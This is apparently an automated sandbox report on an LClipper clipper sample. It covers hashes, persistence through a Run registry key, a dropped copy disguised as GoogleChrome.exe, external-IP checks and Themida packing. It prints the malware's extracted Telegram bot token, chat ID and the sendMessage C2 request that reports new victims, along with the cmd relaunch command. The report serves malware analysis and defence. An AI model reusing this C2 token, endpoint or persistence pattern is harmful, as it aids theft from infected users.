File name:

1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin

Full analysis: https://app.any.run/tasks/c75739f1-53ba-46b7-ab6d-f531e8f8c13e
Verdict: Malicious activity
Analysis date: June 21, 2025, 15:14:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
telegram
lclipper
clipper
auto-reg
ims-api
generic
ip-check
themida
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5:

C1AC8942209B50F3BC9629F6BA99AB43

SHA1:

A79DF776206D70E8067CCA32DDE7A6E0C245619D

SHA256:

1AB0A70579180A2B71214A7BA2ACAC0677F01841E8CD1CB66E92DE4A4392952E

SSDEEP:

98304:gg5m6m07nmPgh/e0/I028+5RRp8BSBc42xoDeZROo9A/6DeJ8JgsvQfPwZAYD8Lh:BqgE0zQM2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • LCLIPPER mutex has been found

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
      • GoogleChrome.exe (PID: 5504)
      • GoogleChrome.exe (PID: 3832)
    • LCLIPPER has been detected (YARA)

      • GoogleChrome.exe (PID: 5504)
    • Changes the autorun value in the registry

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
  • SUSPICIOUS

    • Reads the BIOS version

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
      • GoogleChrome.exe (PID: 5504)
      • GoogleChrome.exe (PID: 3832)
    • Reads security settings of Internet Explorer

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
      • GoogleChrome.exe (PID: 5504)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3396)
      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Application launched itself

      • cmd.exe (PID: 3396)
    • Executable content was dropped or overwritten

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • GoogleChrome.exe (PID: 5504)
    • Checks for external IP

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
      • svchost.exe (PID: 2200)
      • GoogleChrome.exe (PID: 5504)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • GoogleChrome.exe (PID: 5504)
    • There is functionality for capture public ip (YARA)

      • GoogleChrome.exe (PID: 5504)
    • The executable file from the user directory is run by the CMD process

      • GoogleChrome.exe (PID: 5504)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 5724)
  • INFO

    • Checks supported languages

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
      • GoogleChrome.exe (PID: 5504)
      • GoogleChrome.exe (PID: 3832)
    • Launching a file from a Registry key

      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Reads the computer name

      • GoogleChrome.exe (PID: 5504)
      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Creates files or folders in the user directory

      • GoogleChrome.exe (PID: 5504)
      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Reads the software policy settings

      • GoogleChrome.exe (PID: 5504)
      • slui.exe (PID: 6672)
    • Checks proxy server information

      • GoogleChrome.exe (PID: 5504)
      • slui.exe (PID: 6672)
      • 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe (PID: 4984)
    • Reads the machine GUID from the registry

      • GoogleChrome.exe (PID: 5504)
    • Manual execution by a user

      • GoogleChrome.exe (PID: 3832)
    • Themida protector has been detected

      • GoogleChrome.exe (PID: 5504)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(5504) GoogleChrome.exe
Telegram-Tokens (1)7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Telegram-Info-Links
7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Get info about bothttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getMe
Get incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getUpdates
Get webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1z
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1 User-Agent: ClpBot Host: api.telegram.org Cache-Control: no-cache
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:04 16:48:19+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 1816064
InitializedDataSize: 1825280
UninitializedDataSize: -
EntryPoint: 0x986000
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
10
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #LCLIPPER 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs #LCLIPPER googlechrome.exe svchost.exe #LCLIPPER googlechrome.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3396C:\WINDOWS\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\admin\AppData\Local\GoogleChrome.exe"C:\Windows\System32\cmd.exe1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3832C:\Users\admin\AppData\Local\GoogleChrome.exeC:\Users\admin\AppData\Local\GoogleChrome.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\googlechrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3908ping localhost -n 1 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll
4800\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4984"C:\Users\admin\Desktop\1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe" C:\Users\admin\Desktop\1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5060\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5504C:\Users\admin\AppData\Local\GoogleChrome.exe C:\Users\admin\AppData\Local\GoogleChrome.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\googlechrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
ims-api
(PID) Process(5504) GoogleChrome.exe
Telegram-Tokens (1)7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Telegram-Info-Links
7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
Get info about bothttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getMe
Get incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getUpdates
Get webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1z
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
chat_id (1)6299414420
text (1)<b>New connection!</b>
parse_mode (1)HTML HTTP/1.1 User-Agent: ClpBot Host: api.telegram.org Cache-Control: no-cache
Token7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU
End-PointsendMessage
Args
5724cmd /C "ping localhost -n 1 && start C:\Users\admin\AppData\Local\GoogleChrome.exe"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
6672C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
7 765
Read events
7 758
Write events
7
Delete events
0

Modification events

(PID) Process:(4984) 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4984) 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4984) 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4984) 1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Chromium
Value:
C:\Users\admin\AppData\Local\GoogleChrome.exe
(PID) Process:(5504) GoogleChrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5504) GoogleChrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5504) GoogleChrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
1
Suspicious files
0
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
49841ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\line[1].txttext
MD5:258B8EF4896D7B0E517387AAA114FB67
SHA256:D08F3D4CAA465ED3BB4801EA6179B4D766A76849656F9647E66144637B8F1262
5504GoogleChrome.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\line[1].txttext
MD5:258B8EF4896D7B0E517387AAA114FB67
SHA256:D08F3D4CAA465ED3BB4801EA6179B4D766A76849656F9647E66144637B8F1262
49841ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exeC:\Users\admin\AppData\Local\GoogleChrome.exeexecutable
MD5:C1AC8942209B50F3BC9629F6BA99AB43
SHA256:1AB0A70579180A2B71214A7BA2ACAC0677F01841E8CD1CB66E92DE4A4392952E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
50
DNS requests
20
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1268
svchost.exe
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
200
20.190.160.66:443
https://login.live.com/RST2.srf
unknown
xml
1.24 Kb
whitelisted
4984
1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/
unknown
whitelisted
GET
400
149.154.167.99:443
https://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/sendMessage?chat_id=6299414420&text=<b>New%20connection!</b>&parse_mode=HTML
unknown
binary
56 b
whitelisted
POST
400
20.190.160.66:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
5504
GoogleChrome.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/
unknown
whitelisted
POST
200
20.190.159.64:443
https://login.live.com/RST2.srf
unknown
xml
11.1 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.18.121.139:80
crl.microsoft.com
AKAMAI-AS
FR
whitelisted
5944
MoUsoCoreWorker.exe
2.18.121.139:80
crl.microsoft.com
AKAMAI-AS
FR
whitelisted
2.18.121.139:80
crl.microsoft.com
AKAMAI-AS
FR
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
  • 51.124.78.146
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 2.18.121.139
  • 2.18.121.147
  • 2.16.241.12
  • 2.16.241.14
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
login.live.com
  • 40.126.32.136
  • 40.126.32.74
  • 20.190.160.64
  • 40.126.32.133
  • 20.190.160.130
  • 40.126.32.134
  • 20.190.160.3
  • 40.126.32.140
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.48
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted

Threats

PID
Process
Class
Message
2200
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
4984
1ab0a70579180a2b71214a7ba2acac0677f01841e8cd1cb66e92de4a4392952e.bin.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2200
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2200
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
5504
GoogleChrome.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2200
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
5504
GoogleChrome.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
5504
GoogleChrome.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
No debug info